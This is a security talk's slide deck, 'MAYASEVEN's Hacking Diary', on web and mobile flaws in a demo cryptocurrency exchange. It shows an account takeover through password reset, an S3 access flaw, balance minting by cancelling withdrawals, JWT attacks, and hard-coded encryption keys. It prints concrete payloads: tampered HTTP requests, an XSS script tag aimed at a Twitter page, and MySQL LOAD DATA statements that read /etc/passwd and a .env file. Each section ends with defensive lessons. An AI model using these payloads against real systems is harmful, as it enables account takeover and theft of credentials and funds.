![Page 1: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/1.jpg)
MAYASEVEN’sHacking Diary
![Page 2: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/2.jpg)
2
Who are we?
Nop Phoomthaisong
Cybersecurity Consultants, Cybersecurity Researcher
MAYASEVEN Team
The Cybersecurity Expert Guys
![Page 3: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/3.jpg)
3
Agenda1. Account Takeover via Forgot Password Function
2. Amazon S3 Misconfiguration
3. Arbitrarily Create Bitcoin on Web Cryptocurrency Exchange
4. Attacking JSON Web Token
5. XSS Triggered by CSP Bypass
6. Adminer Arbitrary File Read
7. Poor Cryptography Implementation
8. Code Obfuscation?
![Page 4: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/4.jpg)
4
MAYASEVEN Cryptocurrency Exchange
![Page 5: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/5.jpg)
Account Takeovervia Forgot Password Function
![Page 6: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/6.jpg)
6
Typical Forgot Password Workflow
Click forgot password
Received OTP
Confirm OTP
Insert mobile number
Enter new password
Password changed
To identify the account owner
![Page 7: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/7.jpg)
7
Typical Forgot Password Workflow
Click forgot password
Received OTP
Confirm OTP
Insert mobile number
Enter new password
Password changed
To identify the account owner
![Page 8: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/8.jpg)
8
Account Takeover via Forgot Password
Enter new password
Web server
POST /forgot-password.php HTTP/1.1Host: 192.168.1.44:8080User-Agent: Mozilla/5.0 Accept: */*Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 77Connection: closeUpgrade-Insecure-Requests: 1
refotp=b097d6&username=mayaseven&password=mynewpass&confirmpassword=mynewpass
Intercept a request with Burp Suite
![Page 9: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/9.jpg)
9
Account Takeover via Forgot Password
Enter new password
Web server
POST /forgot-password.php HTTP/1.1Host: 192.168.1.44:8080User-Agent: Mozilla/5.0 Accept: */*Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 77Connection: closeUpgrade-Insecure-Requests: 1
refotp=b097d6&username=mark&password=mynewpass&confirmpassword=mynewpass
Change username
![Page 10: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/10.jpg)
10
Account Takeover via Forgot Password
Demo !
![Page 11: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/11.jpg)
11
Lesson Learned• Developers should take care for every stage in workflow
![Page 12: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/12.jpg)
Amazon S3 Misconfiguration
![Page 13: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/13.jpg)
13
Amazon S3 MisconfigurationThe web server keeps all photos in Amazon S3 private cloud storage.
View photo
Webappgenerate
access token
A photo was show
Redirected to Amazon S3
private storage
Access Token
![Page 14: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/14.jpg)
14
Amazon S3 Misconfiguration
Without the Access Token, we cannot access to the photo even when we know the file name.
![Page 15: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/15.jpg)
15
Account takeover via forgot password
Is it still vulnerable?
![Page 16: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/16.jpg)
16
Amazon S3 MisconfigurationThe web server keeps all photos in Amazon S3 private cloud storage.
View photo
Webappgenerate
access token
A photo was show
Redirected to Amazon S3
private storage
Access Token
![Page 17: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/17.jpg)
17
Amazon S3 Misconfiguration
GET /api/s3.php?id_card=id_card_DANIEL.jpgHTTP/1.1Host: 192.168.1.55:8080User-Agent: Mozilla/5.0Accept: */*Accept-Language: en-US,en;q=0.5Connection: closeCookie: token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQiOjEsInRlc3QiOiJ0ZXN0In0sImV4cCI6MTU1ODEyMDUwNH0.9iPkFNFlwF4MK5jD39UqUhrQW4fGS2Mr62l6j6528kIUpgrade-Insecure-Requests: 1
Intercept a request with Burp SuiteWebappgenerate
access token
Redirected to Amazon S3
private storage
id_card_DANIEL.jpg was show
![Page 18: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/18.jpg)
18
Amazon S3 Misconfiguration
GET /api/s3.php?id_card=id_card_mayaseven.jpgHTTP/1.1Host: 192.168.1.55:8080User-Agent: Mozilla/5.0Accept: */*Accept-Language: en-US,en;q=0.5Connection: closeCookie: token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQiOjEsInRlc3QiOiJ0ZXN0In0sImV4cCI6MTU1ODEyMDUwNH0.9iPkFNFlwF4MK5jD39UqUhrQW4fGS2Mr62l6j6528kIUpgrade-Insecure-Requests: 1
Intercept a request with Burp SuiteWebappgenerate
access token
Redirected to Amazon S3
private storage
id_card_mayaseven.jpg was show
![Page 19: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/19.jpg)
19
Lesson Learned• A bucket turn off permission to access for "Everyone" (Turn off Object list).
• Web application must validate the authorization before generate token to access to the resources.
![Page 20: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/20.jpg)
Arbitrarily Create Bitcoin
![Page 21: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/21.jpg)
21
Arbitrarily Create Bitcoin
Withdraw cryptocurrency
Cancel a withdrawal transaction
Cryptocurrency transferred back to the user’s balance
Balance deducted
![Page 22: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/22.jpg)
22
Arbitrarily Create Bitcoin
Withdraw cryptocurrency
Cancel a withdrawal transaction
Cryptocurrency transferred back to the user’s balance
Balance deducted
![Page 23: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/23.jpg)
23
Arbitrarily Create Bitcoin
WebappGET /transaction.php?cancel_withdraw_transactionid=MjQ=HTTP/1.1Host: 192.168.1.44:8080User-Agent: Mozilla/5.0Accept: */*Accept-Language: en-US,en;q=0.5Connection: closeCookie: token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQiOjEsInRlc3QiOiJ0ZXN0In0sImV4cCI6MTU1ODEyMDM5OX0.E_VOI2BCXNFvmgNhWMQWREfXZc49LSWLW80DESzCPgUUpgrade-Insecure-Requests: 1
Intercept a request with Burp SuiteCancel a withdrawal transaction
Cryptocurrency transferred back
to the user’s balance
![Page 24: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/24.jpg)
MAYASEVEN 24
![Page 25: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/25.jpg)
25
Arbitrarily Create Bitcoin
Demo !
![Page 26: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/26.jpg)
30
Lesson Learned• Limit transaction to be canceled only one time.
• Transaction ID should be unpredictable.
• Check the authorization.
![Page 27: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/27.jpg)
Attacking JSON Web Token
![Page 28: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/28.jpg)
32
Attacking JSON Web Token
JSON Web Token ( JWT):
• A compact and self-contained way for securely transmitting information between parties as a JSON object
• This information can be verified and trusted because it is digitally signed.
• Consist of three parts separated by dots (.), which are Header.Payload.Signature, each part encoded with
base64.
example: xxxxx.yyyyy.zzzzz
![Page 29: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/29.jpg)
33
Attacking JSON Web Token
Header:
• The header typically consists of two parts which is JWT and the hashing algorithm.
• Then this JSON is Base64 encoded to form the first part of the JWT
![Page 30: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/30.jpg)
34
Attacking JSON Web Token
Payload:
• Contains statements about an entity and additional metadata.
• Then this JSON is Base64 encoded to form the first part of the JWT
![Page 31: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/31.jpg)
35
Attacking JSON Web Token
Signature:
• Sign the encoded header and payload by using a key and the algorithm specified in the header.
Using defined “alg” in the Header part for signing.
![Page 32: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/32.jpg)
36
Attacking JSON Web Token
We cannot change any field in JWT because of
signature verification, so how to attacks JWT ?
![Page 33: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/33.jpg)
37
Attacking JSON Web Token
Three ways for attacking JWT:
• Cracking HMAC by using wordlist or Brute Forcing
• None Algorithm Attack
• Modifying algorithm in the “alg” field
![Page 34: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/34.jpg)
38
Attacking JSON Web Token
Demo !
![Page 35: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/35.jpg)
39
Lesson Learned• For HMAC, use strong symmetric key.
• Never accept the “none” algorithm.
• Use reliable JWT library.
![Page 36: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/36.jpg)
XSS Triggered by CSP Bypass
![Page 37: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/37.jpg)
41
XSS Triggered by CSP Bypass
• CSP (Content-Security-Policy)
• Header to prevent cross-site scripting (XSS resulting from execution of malicious content in the trusted web page context).
content-security-policy: default-src ‘self’ ; connect-src ‘self’ ; font-src ‘self’ https://*.twimg.com https://*.twitter.com data:; frame-src ‘self’ https://twitter.com https://*.twitter.com; script-src ‘self’ https://*.twitter.com;
![Page 38: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/38.jpg)
42
Typical XSS
WebsiteAttacker inject
a script to a webpage
JavaScript executed
Victim access the webpage
![Page 39: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/39.jpg)
43
Implement CSP to Protect XSS
Website with CSP header
Attacker inject a script to a
webpage
JavaScript not executed
Victim access the webpage
![Page 40: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/40.jpg)
44
Implement CSP to Protect XSS
So, how to bypass Content Security Policy?
![Page 41: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/41.jpg)
45
How to bypass CSP ?
Find XSS entry point
Find input return in response
Inject script with external
script file
• Input return in response
• Reflection of input arises when data is copied from a request and echoed into the application's immediate response.
Script executed
![Page 42: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/42.jpg)
46
XSS Triggered by CSP Bypass
• XSS on website with CSP
Script could not execute because it was blocked by Content-Security-Policy.
https://careers.twitter.com/en/jobs-search.html?location=1”onmouseove=“alert(1)”
Find XSS entry point
![Page 43: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/43.jpg)
47
XSS Triggered by CSP Bypass
• Input return in response
Input being returned in the application responses is not a vulnerability in its own right. However, it is a prerequisite for XSS in this case.
Find input return in response
![Page 44: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/44.jpg)
48
XSS Triggered by CSP Bypass
• Final Payload and URL
<script src=“//analytics.twitter.com/tpm?tpm_cb=alert(document.domain)>//”></script>
Inject script with external
script file
![Page 45: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/45.jpg)
49
XSS Triggered by CSP Bypass
Demo !
![Page 46: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/46.jpg)
50
Lesson Learned
• Input or output should be sanitized.
• Cannot use only CSP to prevent XSS
![Page 47: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/47.jpg)
Adminer Arbitrary File Read
![Page 48: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/48.jpg)
52
Adminer Arbitrary File Read• Adminer
• A database management in a single PHP file , which allows the user connecting to any database server.
• How to find adminer path?
• Dirsearch, wfuzz and etc.
![Page 49: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/49.jpg)
53
Adminer Arbitrary File Read
• Create databases and tables.
• MySQL command to read the local files on the server
![Page 50: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/50.jpg)
54
Adminer Arbitrary File Read
• Create databases and tables.
![Page 51: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/51.jpg)
55
Adminer Arbitrary File Read• Use MySQL command to read the local files on the server. The example below,
we read /etc/passwd file and put the content to the test table in the server.
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test.testFIELDS TERMINATED BY "\n"
![Page 52: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/52.jpg)
56
Adminer Arbitrary File Read
![Page 53: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/53.jpg)
57
Adminer Arbitrary File Read
• Read Nginx configuration file
LOAD DATA LOCAL INFILE /etc/nginx/sites-enabled/{filename}' INTO TABLE test.testFIELDS TERMINATED BY "\n"
![Page 54: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/54.jpg)
58
Adminer Arbitrary File Read
• Read database.php
![Page 55: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/55.jpg)
59
Adminer Arbitrary File Read
• In a real case, the server used Laravel, and we could read .env file and found the SSH root password.
• Path of the .env file was found in error handling.
LOAD DATA LOCAL INFILE /usr/share/nginx/html/mayasevenexchange/.env}' INTO TABLE test.testFIELDS TERMINATED BY "\n"
![Page 56: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/56.jpg)
60
Adminer Arbitrary File Read
Demo !
![Page 57: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/57.jpg)
61
Lesson Learned
• Remove all unnecessary dependencies.
• Have an inventory of all your components on the client-side and server-side.
• Monitor sources like Common Vulnerabilities and Disclosures (CVE) and National Vulnerability Database (NVD) for vulnerabilities in the components.
• Obtain components only from official sources.
• Get rid of components not actively maintained.
![Page 58: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/58.jpg)
Poor CryptographyImplementation
![Page 59: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/59.jpg)
63
Poor Cryptography Implementation
• From above demos, an attacker could manipulate the request before sending to the server.
• Some developer thought that they can prevent by encrypting all payloads.
Then what’s a problem?
![Page 60: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/60.jpg)
64
Normal HTTP request/response
Example request
Example response
![Page 61: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/61.jpg)
65
Encrypted HTTP request/response
Example request
Example response
![Page 62: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/62.jpg)
66
Poor Cryptography Implementation
Demo !
![Page 63: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/63.jpg)
67
Lesson Learned
• Hacker always win the client-side encryption.
• Validate all request data at the backend server.
![Page 64: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/64.jpg)
Code Obfuscation?
![Page 65: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/65.jpg)
69
Code Obfuscation?
Mobile application:
• An android application “MAYASEVEN Exchange” has a hard-coded key for encrypting/decrypting JSON data
which send through HTTPS.
Security Controls:
• Encrypt all JSON data.
• ProGuard for obfuscation.
![Page 66: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/66.jpg)
70
Code Obfuscation?
Problem:
• An application used hard-coded key and IV for encrypting JSON data with AES/CBC/PKCS7Padding algorithm
before sending to the API server.
![Page 67: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/67.jpg)
71
Code Obfuscation?
Attack:
• Understanding HTTP request and response.
• Decompile APK and review the obfuscated code.
• Found key and IV in shared object file (libnative-lib.so).
• Manipulate payload for querying data from the server.
![Page 68: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/68.jpg)
72
Understanding HTTP request and response
Example request
Example response
![Page 69: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/69.jpg)
73
Decompile APK and review the code
